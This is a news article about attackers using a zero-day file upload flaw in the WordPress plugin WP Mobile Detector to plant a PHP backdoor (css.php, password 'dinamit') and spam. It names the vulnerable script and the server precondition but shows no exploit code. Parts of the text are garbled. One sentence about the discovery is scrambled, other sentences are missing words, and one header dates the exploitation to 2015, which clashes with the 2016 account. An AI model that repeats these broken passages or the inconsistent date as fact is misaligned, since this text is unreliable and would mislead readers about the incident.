Attackers have been using a newly discovered zero-day in the WP Mobile Detector plugin to upload backdoor scripts on WordPress sites, and are currently using it to upload adult-themed SEO spam on affected websites.
Theplugin is a simple tool that detects mobile users and allows webmasters to load a specific mobile-friendly theme based on the user’s device.
Zero-day is in the plugin’s image upload&resize script
The team at Plugin Vulnerabilities have /wp-content/plugins/wp-mobile-detector/resize.php” file.that the plugin features an arbitrary file upload vulnerability in the “
This file handles image uploads, and according to the researchers that discovered the security bug, lacks basic input filtering, allowing an attacker to pass a malicious file that gets uploaded to the plugin’s /cache directory.
Using this vulnerability attackers can upload PHP-based backdoors on WordPress sites, something which should have been almost impossible in 2016, after almost two decades of PHP coding and basic lessons in file upload security.
Zero-day exploited since May 26, 2015
The Plugin Vulnerabilities team says it discovered this backdoor on May 29 when it also notified the developer. Two days later, the team also notified Automattic, who removed the plugin from the WordPress.org Plugin Directory.
At the time it was removed, the plugin had. In the meantime, the developer has patched his plugin, which was reuploaded on the Plugin Directory, but now, there are only around 1,000 users running the plugin on their site, after webmasters rushed to uninstall the insecure extension.
Many did so because US security firmthat its Web Application Firewall had detected attacks using this vulnerability since May 26, three days before the Plugin Vulnerabilities team discovered it, and five days before Automattic removed the plugin from the Plugin Directory.
Hackers uploaded a backdoor on the site with the password “dinamit”
Sucuri’s Douglas Santos says the vulnerability is trivial to exploit and the backdoor script (css.php) works with the “dinamit” password, the Russian word for dynamite.
The WP Mobile Detector zero-day works regardless of what image processing library is installed on the server, so there’s no connection to the ImageTragick vulnerability.
The Plugins Vulnerabilities team says the only condition is that the server has PHP’s allow_url_fopen option enabled. The WP Mobile Detector plugin version 3.6 fixed the zero-day, but the plugin has already been updated to version 3.7.